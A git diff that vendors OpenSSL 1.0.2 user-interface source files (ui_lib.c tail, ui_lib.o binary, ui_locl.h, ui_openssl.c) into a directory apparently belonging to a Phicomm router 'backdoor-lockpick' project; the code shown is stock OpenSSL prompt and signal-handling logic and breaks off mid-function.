+            UIerr(UI_F_UI_SET_RESULT, UI_R_NO_RESULT_BUFFER);
+            return -1;
+        }
+
+        BUF_strlcpy(uis->result_buf, result,
+                    uis->_.string_data.result_maxsize + 1);
+        break;
+    case UIT_BOOLEAN:
+        {
+            const char *p;
+
+            if (!uis->result_buf) {
+                UIerr(UI_F_UI_SET_RESULT, UI_R_NO_RESULT_BUFFER);
+                return -1;
+            }
+
+            uis->result_buf[0] = '\0';
+            for (p = result; *p; p++) {
+                if (strchr(uis->_.boolean_data.ok_chars, *p)) {
+                    uis->result_buf[0] = uis->_.boolean_data.ok_chars[0];
+                    break;
+                }
+                if (strchr(uis->_.boolean_data.cancel_chars, *p)) {
+                    uis->result_buf[0] = uis->_.boolean_data.cancel_chars[0];
+                    break;
+                }
+            }
+        }
+    default:
+        break;
+    }
+    return 0;
+
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..dd149dd38e941a9db78ded6d352abe5b517c1057
GIT binary patch
literal 2608
zcmbW2UuzRV5WqLRYO7Y;ibA0(hYwoO9!XoUDwKn^rb1D%1O&z7a@n@Q<SyJF+bH-4
zML`hy;De8S^uZ6%$ADkL$9@IzO@umgH<N5P_tb&S%=~s{cQdouyjfnoJ5VSHmV#Ii
zJ&&mn#p6BOPEA{kiBa)q^wQr_=O?N?%uB76FUK%MqrLf_m4-n6QqpX;%_NecS@&ZZ
zuDhO0cRBJ$d2#W!IaR49ew>)MtXZo#UAmd1Zt3+*(JIbe%W$^CAgD1Ic<}Q5iWm^0
zgUo<|axPP%@bZx;Y>yQtM}~%X;0t5U1)3WojjTxaNrf$uJ)*G3IdP2~_BMxoC6*Q&
zY~1%dF+K~qeF}RuD1IOGO#m=*Zvb+x#^EdjR>~72t!Dp>A(YFcOdH~a;`K~Ja20zD
zEkm3-49GLYa39AN&MM!F>vNen`@GXE@o`#-d$s`nxN`n^nlDrQMe=!_C&aI6yhXgE
z@mIv}5a-^$CvFqx^NOVIH0o8$6E*w^IiYlG&Q@5Dr4z+r-QOS{w50ENjUbYua?g1H
z-rCwKCZ}o0+*-}4`>iDAL}D*wSYK}|uoVWLj3Ufg4`sTZFSqDi6QtqyBhJA1caRC;
zv;+K|ka4H*K5~tb<6TBUu6Ef(2%__;45wUO$0UyD!ND>|26L|GipIJBPc_bc#y+C(
zI^5?E8SZlK^EZuipMPlFCSO=lyBWJx&~cdQO}0YWaIIKw$HJ<)u`8@9bj1n-bTGVR
zmB7WIlz?S50?%y-%L|%K=|i3$#L|NIZaRux?>YG!equqBTQZE>w1C`%Ub{`nr#iAW
zArpJ2zW_EclyauJpBSskBslom*eV43Aw5BS|4swLT)tn-uMpQ?vQNPCMBo1g1mT)T
z&BuFyYtFz>h4(+NLa=#%*2~27{dXyEo-`|y4bnE~y!vfY{kAC%>xVtk>sJAWXDPx^
z<rg{ERR}hpoAon=si6i3s4yqi2Q~yl{Vik4Fy))*D8lDw^brgU)$^w)e~$x6>-q11
z=hbhY>erz>tRKExoIgQ4Z*QF1r~O&u+nJY-|B!m`F~39bGdhaUvR#7jSzi7wJ<2=X
J$js35{{t@a!?FMX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_locl.h
new file mode 100644
index 0000000..0d919cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_locl.h
@@ -0,0 +1,145 @@
+/* crypto/ui/ui.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_UI_LOCL_H
+# define HEADER_UI_LOCL_H
+
+# include <openssl/ui.h>
+# include <openssl/crypto.h>
+
+# ifdef _
+#  undef _
+# endif
+
+struct ui_method_st {
+    char *name;
+    /*
+     * All the functions return 1 or non-NULL for success and 0 or NULL for
+     * failure
+     */
+    /*
+     * Open whatever channel for this, be it the console, an X window or
+     * whatever. This function should use the ex_data structure to save
+     * intermediate data.
+     */
+    int (*ui_open_session) (UI *ui);
+    int (*ui_write_string) (UI *ui, UI_STRING *uis);
+    /*
+     * Flush the output.  If a GUI dialog box is used, this function can be
+     * used to actually display it.
+     */
+    int (*ui_flush) (UI *ui);
+    int (*ui_read_string) (UI *ui, UI_STRING *uis);
+    int (*ui_close_session) (UI *ui);
+    /*
+     * Construct a prompt in a user-defined manner.  object_desc is a textual
+     * short description of the object, for example "pass phrase", and
+     * object_name is the name of the object (might be a card name or a file
+     * name. The returned string shall always be allocated on the heap with
+     * OPENSSL_malloc(), and need to be free'd with OPENSSL_free().
+     */
+    char *(*ui_construct_prompt) (UI *ui, const char *object_desc,
+                                  const char *object_name);
+};
+
+struct ui_string_st {
+    enum UI_string_types type;  /* Input */
+    const char *out_string;     /* Input */
+    int input_flags;            /* Flags from the user */
+    /*
+     * The following parameters are completely irrelevant for UIT_INFO, and
+     * can therefore be set to 0 or NULL
+     */
+    char *result_buf;           /* Input and Output: If not NULL,
+                                 * user-defined with size in result_maxsize.
+                                 * Otherwise, it may be allocated by the UI
+                                 * routine, meaning result_minsize is going
+                                 * to be overwritten. */
+    union {
+        struct {
+            int result_minsize; /* Input: minimum required size of the
+                                 * result. */
+            int result_maxsize; /* Input: maximum permitted size of the
+                                 * result */
+            const char *test_buf; /* Input: test string to verify against */
+        } string_data;
+        struct {
+            const char *action_desc; /* Input */
+            const char *ok_chars; /* Input */
+            const char *cancel_chars; /* Input */
+        } boolean_data;
+    } _;
+
+# define OUT_STRING_FREEABLE 0x01
+    int flags;                  /* flags for internal use */
+};
+
+struct ui_st {
+    const UI_METHOD *meth;
+    STACK_OF(UI_STRING) *strings; /* We might want to prompt for more than
+                                   * one thing at a time, and with different
+                                   * echoing status.  */
+    void *user_data;
+    CRYPTO_EX_DATA ex_data;
+# define UI_FLAG_REDOABLE        0x0001
+# define UI_FLAG_PRINT_ERRORS    0x0100
+    int flags;
+};
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_openssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_openssl.c
new file mode 100644
index 0000000..de4c32c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_openssl.c
@@ -0,0 +1,729 @@
+/* crypto/ui/ui_openssl.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) and others for the
+ * OpenSSL project 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*-
+ * The lowest level part of this file was previously in crypto/des/read_pwd.c,
+ * Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define OPENSSL_NO_TTY 1
+
+#ifndef OPENSSL_NO_TTY
+
+#include <openssl/e_os2.h>
+
+/*
+ * need for #define _POSIX_C_SOURCE arises whenever you pass -ansi to gcc
+ * [maybe others?], because it masks interfaces not discussed in standard,
+ * sigaction and fileno included. -pedantic would be more appropriate for the
+ * intended purposes, but we can't prevent users from adding -ansi.
+ */
+#if defined(OPENSSL_SYSNAME_VXWORKS)
+# include <sys/types.h>
+#endif
+
+#if !defined(_POSIX_C_SOURCE) && defined(OPENSSL_SYS_VMS)
+# ifndef _POSIX_C_SOURCE
+#  define _POSIX_C_SOURCE 2
+# endif
+#endif
+#include <signal.h>
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+
+#if !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_VMS)
+# ifdef OPENSSL_UNISTD
+#  include OPENSSL_UNISTD
+# else
+#  include <unistd.h>
+# endif
+/*
+ * If unistd.h defines _POSIX_VERSION, we conclude that we are on a POSIX
+ * system and have sigaction and termios.
+ */
+# if defined(_POSIX_VERSION)
+
+#  define SIGACTION
+#  if !defined(TERMIOS) && !defined(TERMIO) && !defined(SGTTY)
+#   define TERMIOS
+#  endif
+
+# endif
+#endif
+
+#ifdef WIN16TTY
+# undef OPENSSL_SYS_WIN16
+# undef WIN16
+# undef _WINDOWS
+# include <graph.h>
+#endif
+
+/* 06-Apr-92 Luke Brennan    Support for VMS */
+#include "ui_locl.h"
+#include "cryptlib.h"
+
+#ifdef OPENSSL_SYS_VMS          /* prototypes for sys$whatever */
+# include <starlet.h>
+# ifdef __DECC
+#  pragma message disable DOLLARID
+# endif
+#endif
+
+#ifdef WIN_CONSOLE_BUG
+# include <windows.h>
+# ifndef OPENSSL_SYS_WINCE
+#  include <wincon.h>
+# endif
+#endif
+
+/*
+ * There are 5 types of terminal interface supported, TERMIO, TERMIOS, VMS,
+ * MSDOS and SGTTY
+ */
+
+#if defined(__sgi) && !defined(TERMIOS)
+# define TERMIOS
+# undef  TERMIO
+# undef  SGTTY
+#endif
+
+#if defined(linux) && !defined(TERMIO)
+# undef  TERMIOS
+# define TERMIO
+# undef  SGTTY
+#endif
+
+#ifdef _LIBC
+# undef  TERMIOS
+# define TERMIO
+# undef  SGTTY
+#endif
+
+#if !defined(TERMIO) && !defined(TERMIOS) && !defined(OPENSSL_SYS_VMS) && !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_MACINTOSH_CLASSIC) && !defined(MAC_OS_GUSI_SOURCE)
+# undef  TERMIOS
+# undef  TERMIO
+# define SGTTY
+#endif
+
+#if defined(OPENSSL_SYS_VXWORKS)
+# undef TERMIOS
+# undef TERMIO
+# undef SGTTY
+#endif
+
+#if defined(OPENSSL_SYS_NETWARE)
+# undef TERMIOS
+# undef TERMIO
+# undef SGTTY
+#endif
+
+#ifdef TERMIOS
+# include <termios.h>
+# define TTY_STRUCT             struct termios
+# define TTY_FLAGS              c_lflag
+# define TTY_get(tty,data)      tcgetattr(tty,data)
+# define TTY_set(tty,data)      tcsetattr(tty,TCSANOW,data)
+#endif
+
+#ifdef TERMIO
+# include <termios.h>
+# define TTY_STRUCT             struct termio
+# define TTY_FLAGS              c_lflag
+# define TTY_get(tty,data)      ioctl(tty,TCGETA,data)
+# define TTY_set(tty,data)      ioctl(tty,TCSETA,data)
+#endif
+
+#ifdef SGTTY
+# include <sgtty.h>
+# define TTY_STRUCT             struct sgttyb
+# define TTY_FLAGS              sg_flags
+# define TTY_get(tty,data)      ioctl(tty,TIOCGETP,data)
+# define TTY_set(tty,data)      ioctl(tty,TIOCSETP,data)
+#endif
+
+#if !defined(_LIBC) && !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_VMS) && !defined(OPENSSL_SYS_MACINTOSH_CLASSIC) && !defined(OPENSSL_SYS_SUNOS)
+# include <sys/ioctl.h>
+#endif
+
+#ifdef OPENSSL_SYS_MSDOS
+# include <conio.h>
+#endif
+
+#ifdef OPENSSL_SYS_VMS
+# include <ssdef.h>
+# include <iodef.h>
+# include <ttdef.h>
+# include <descrip.h>
+struct IOSB {
+    short iosb$w_value;
+    short iosb$w_count;
+    long iosb$l_info;
+};
+#endif
+
+#ifdef OPENSSL_SYS_SUNOS
+typedef int sig_atomic_t;
+#endif
+
+#if defined(OPENSSL_SYS_MACINTOSH_CLASSIC) || defined(MAC_OS_GUSI_SOURCE) || defined(OPENSSL_SYS_NETWARE)
+/*
+ * This one needs work. As a matter of fact the code is unoperational
+ * and this is only a trick to get it compiled.
+ *                                      <appro@fy.chalmers.se>
+ */
+# define TTY_STRUCT int
+#endif
+
+#ifndef NX509_SIG
+# define NX509_SIG 32
+#endif
+
+/* Define globals.  They are protected by a lock */
+#ifdef SIGACTION
+static struct sigaction savsig[NX509_SIG];
+#else
+static void (*savsig[NX509_SIG]) (int);
+#endif
+
+#ifdef OPENSSL_SYS_VMS
+static struct IOSB iosb;
+static $DESCRIPTOR(terminal, "TT");
+static long tty_orig[3], tty_new[3]; /* XXX Is there any guarantee that this
+                                      * will always suffice for the actual
+                                      * structures? */
+static long status;
+static unsigned short channel = 0;
+#else
+# if !defined(OPENSSL_SYS_MSDOS) || defined(__DJGPP__)
+static TTY_STRUCT tty_orig, tty_new;
+# endif
+#endif
+static FILE *tty_in, *tty_out;
+static int is_a_tty;
+
+/* Declare static functions */
+#if !defined(OPENSSL_SYS_WIN16) && !defined(OPENSSL_SYS_WINCE)
+static int read_till_nl(FILE *);
+static void recsig(int);
+static void pushsig(void);
+static void popsig(void);
+#endif
+#if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_WIN16)
+static int noecho_fgets(char *buf, int size, FILE *tty);
+#endif
+static int read_string_inner(UI *ui, UI_STRING *uis, int echo, int strip_nl);
+
+static int read_string(UI *ui, UI_STRING *uis);
+static int write_string(UI *ui, UI_STRING *uis);
+
+static int open_console(UI *ui);
+static int echo_console(UI *ui);
+static int noecho_console(UI *ui);
+static int close_console(UI *ui);
+
+static UI_METHOD ui_openssl = {
+    "OpenSSL default user interface",
+    open_console,
+    write_string,
+    NULL,                       /* No flusher is needed for command lines */
+    read_string,
+    close_console,
+    NULL
+};
+
+/* The method with all the built-in thingies */
+UI_METHOD *UI_OpenSSL(void)
+{
+    return &ui_openssl;
+}
+
+/*
+ * The following function makes sure that info and error strings are printed
+ * before any prompt.
+ */
+static int write_string(UI *ui, UI_STRING *uis)
+{
+    switch (UI_get_string_type(uis)) {
+    case UIT_ERROR:
+    case UIT_INFO:
+        fputs(UI_get0_output_string(uis), tty_out);
+        fflush(tty_out);
+        break;
+    default:
+        break;
+    }
+    return 1;
+}
+
+static int read_string(UI *ui, UI_STRING *uis)
+{
+    int ok = 0;
+
+    switch (UI_get_string_type(uis)) {
+    case UIT_BOOLEAN:
+        fputs(UI_get0_output_string(uis), tty_out);
+        fputs(UI_get0_action_string(uis), tty_out);
+        fflush(tty_out);
+        return read_string_inner(ui, uis,
+                                 UI_get_input_flags(uis) & UI_INPUT_FLAG_ECHO,
+                                 0);
+    case UIT_PROMPT:
+        fputs(UI_get0_output_string(uis), tty_out);
+        fflush(tty_out);
+        return read_string_inner(ui, uis,
+                                 UI_get_input_flags(uis) & UI_INPUT_FLAG_ECHO,
+                                 1);
+    case UIT_VERIFY:
+        fprintf(tty_out, "Verifying - %s", UI_get0_output_string(uis));
+        fflush(tty_out);
+        if ((ok = read_string_inner(ui, uis,
+                                    UI_get_input_flags(uis) &
+                                    UI_INPUT_FLAG_ECHO, 1)) <= 0)
+            return ok;
+        if (strcmp(UI_get0_result_string(uis), UI_get0_test_string(uis)) != 0) {
+            fprintf(tty_out, "Verify failure\n");
+            fflush(tty_out);
+            return 0;
+        }
+        break;
+    default:
+        break;
+    }
+    return 1;
+}
+
+#if !defined(OPENSSL_SYS_WIN16) && !defined(OPENSSL_SYS_WINCE)
+/* Internal functions to read a string without echoing */
+static int read_till_nl(FILE *in)
+{
+# define SIZE 4
+    char buf[SIZE + 1];
+
+    do {
+        if (!fgets(buf, SIZE, in))
+            return 0;
+    } while (strchr(buf, '\n') == NULL);
+    return 1;
+}
+
+static volatile sig_atomic_t intr_signal;
+#endif
+
+static int read_string_inner(UI *ui, UI_STRING *uis, int echo, int strip_nl)
+{
+    static int ps;
+    int ok;
+    char result[BUFSIZ];
+    int maxsize = BUFSIZ - 1;
+#if !defined(OPENSSL_SYS_WIN16) && !defined(OPENSSL_SYS_WINCE)
+    char *p;
+
+    intr_signal = 0;
+    ok = 0;
+    ps = 0;
+
+    pushsig();
+    ps = 1;
+
+    if (!echo && !noecho_console(ui))
+        goto error;
+    ps = 2;
+
+    result[0] = '\0';
+# ifdef OPENSSL_SYS_MSDOS
+    if (!echo) {
+        noecho_fgets(result, maxsize, tty_in);
+        p = result;             /* FIXME: noecho_fgets doesn't return errors */
+    } else
+        p = fgets(result, maxsize, tty_in);
+# else
+    p = fgets(result, maxsize, tty_in);
+# endif
+    if (!p)
+        goto error;
+    if (feof(tty_in))
+        goto error;
+    if (ferror(tty_in))
+        goto error;
+    if ((p = (char *)strchr(result, '\n')) != NULL) {
+        if (strip_nl)
+            *p = '\0';
+    } else if (!read_till_nl(tty_in))
+        goto error;
+    if (UI_set_result(ui, uis, result) >= 0)
+        ok = 1;
+
+ error:
+    if (intr_signal == SIGINT)
+        ok = -1;
+    if (!echo)
+        fprintf(tty_out, "\n");
+    if (ps >= 2 && !echo && !echo_console(ui))
+        ok = 0;
+
+    if (ps >= 1)
+        popsig();
+#else
+    ok = 1;
+#endif
+
+    OPENSSL_cleanse(result, BUFSIZ);
+    return ok;
+}
+
+/* Internal functions to open, handle and close a channel to the console.  */
+static int open_console(UI *ui)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_UI);
+    is_a_tty = 1;
+
+#if defined(OPENSSL_SYS_MACINTOSH_CLASSIC) || defined(OPENSSL_SYS_VXWORKS) || defined(OPENSSL_SYS_NETWARE) || defined(OPENSSL_SYS_BEOS)
+    tty_in = stdin;
+    tty_out = stderr;
+#else
+# ifdef OPENSSL_SYS_MSDOS
+#  define DEV_TTY "con"
+# else
+#  define DEV_TTY "/dev/tty"
+# endif
+    if ((tty_in = fopen(DEV_TTY, "r")) == NULL)
+        tty_in = stdin;
+    if ((tty_out = fopen(DEV_TTY, "w")) == NULL)
+        tty_out = stderr;
+#endif
+
+#if defined(TTY_get) && !defined(OPENSSL_SYS_VMS)
+    if (TTY_get(fileno(tty_in), &tty_orig) == -1) {
+# ifdef ENOTTY
+        if (errno == ENOTTY)
+            is_a_tty = 0;
+        else
+# endif
+# ifdef EINVAL
+            /*
+             * Ariel Glenn ariel@columbia.edu reports that solaris can return
+             * EINVAL instead.  This should be ok
+             */
+        if (errno == EINVAL)
+            is_a_tty = 0;
+        else
+# endif
+            return 0;
+    }
+#endif
+#ifdef OPENSSL_SYS_VMS
+    status = sys$assign(&terminal, &channel, 0, 0);
+    if (status != SS$_NORMAL)
+        return 0;
+    status =
+        sys$qiow(0, channel, IO$_SENSEMODE, &iosb, 0, 0, tty_orig, 12, 0, 0,
+                 0, 0);
+    if ((status != SS$_NORMAL) || (iosb.iosb$w_value != SS$_NORMAL))
+        return 0;
+#endif
+    return 1;
+}
+
+static int noecho_console(UI *ui)
+{
+#ifdef TTY_FLAGS
+    memcpy(&(tty_new), &(tty_orig), sizeof(tty_orig));
+    tty_new.TTY_FLAGS &= ~ECHO;
+#endif
+
+#if defined(TTY_set) && !defined(OPENSSL_SYS_VMS)
+    if (is_a_tty && (TTY_set(fileno(tty_in), &tty_new) == -1))
+        return 0;
+#endif
+#ifdef OPENSSL_SYS_VMS
+    tty_new[0] = tty_orig[0];
+    tty_new[1] = tty_orig[1] | TT$M_NOECHO;
+    tty_new[2] = tty_orig[2];
+    status =
+        sys$qiow(0, channel, IO$_SETMODE, &iosb, 0, 0, tty_new, 12, 0, 0, 0,
+                 0);
+    if ((status != SS$_NORMAL) || (iosb.iosb$w_value != SS$_NORMAL))
+        return 0;
+#endif
+    return 1;
+}
+
+static int echo_console(UI *ui)
+{
+#if defined(TTY_set) && !defined(OPENSSL_SYS_VMS)
+    memcpy(&(tty_new), &(tty_orig), sizeof(tty_orig));
+    tty_new.TTY_FLAGS |= ECHO;
+#endif
+
+#if defined(TTY_set) && !defined(OPENSSL_SYS_VMS)
+    if (is_a_tty && (TTY_set(fileno(tty_in), &tty_new) == -1))
+        return 0;
+#endif
+#ifdef OPENSSL_SYS_VMS
+    tty_new[0] = tty_orig[0];
+    tty_new[1] = tty_orig[1] & ~TT$M_NOECHO;
+    tty_new[2] = tty_orig[2];
+    status =
+        sys$qiow(0, channel, IO$_SETMODE, &iosb, 0, 0, tty_new, 12, 0, 0, 0,
+                 0);
+    if ((status != SS$_NORMAL) || (iosb.iosb$w_value != SS$_NORMAL))
+        return 0;
+#endif
+    return 1;
+}
+
+static int close_console(UI *ui)
+{
+    if (tty_in != stdin)
+        fclose(tty_in);
+    if (tty_out != stderr)
+        fclose(tty_out);
+#ifdef OPENSSL_SYS_VMS
+    status = sys$dassgn(channel);
+#endif
+    CRYPTO_w_unlock(CRYPTO_LOCK_UI);
+
+    return 1;
+}
+
+#if !defined(OPENSSL_SYS_WIN16) && !defined(OPENSSL_SYS_WINCE)
+/* Internal functions to handle signals and act on them */
+static void pushsig(void)
+{
+# ifndef OPENSSL_SYS_WIN32
+    int i;
+# endif
+# ifdef SIGACTION
+    struct sigaction sa;
+
+    memset(&sa, 0, sizeof sa);
+    sa.sa_handler = recsig;
+# endif
+
+# ifdef OPENSSL_SYS_WIN32
+    savsig[SIGABRT] = signal(SIGABRT, recsig);
+    savsig[SIGFPE] = signal(SIGFPE, recsig);
+    savsig[SIGILL] = signal(SIGILL, recsig);
+    savsig[SIGINT] = signal(SIGINT, recsig);
+    savsig[SIGSEGV] = signal(SIGSEGV, recsig);
+    savsig[SIGTERM] = signal(SIGTERM, recsig);
+# else
+    for (i = 1; i < NX509_SIG; i++) {
+#  ifdef SIGUSR1
+        if (i == SIGUSR1)
+            continue;
+#  endif
+#  ifdef SIGUSR2
+        if (i == SIGUSR2)
+            continue;
+#  endif
+#  ifdef SIGKILL
+        if (i == SIGKILL)       /* We can't make any action on that. */
+            continue;
+#  endif
+#  ifdef SIGACTION
+        sigaction(i, &sa, &savsig[i]);
+#  else
+        savsig[i] = signal(i, recsig);
+#  endif
+    }
+# endif
+
+# ifdef SIGWINCH
+    signal(SIGWINCH, SIG_DFL);
+# endif
+}
+
+static void popsig(void)
+{
+# ifdef OPENSSL_SYS_WIN32
+    signal(SIGABRT, savsig[SIGABRT]);
+    signal(SIGFPE, savsig[SIGFPE]);
+    signal(SIGILL, savsig[SIGILL]);
+    signal(SIGINT, savsig[SIGINT]);
+    signal(SIGSEGV, savsig[SIGSEGV]);
+    signal(SIGTERM, savsig[SIGTERM]);
+# else
+    int i;
+    for (i = 1; i < NX509_SIG; i++) {
+#  ifdef SIGUSR1
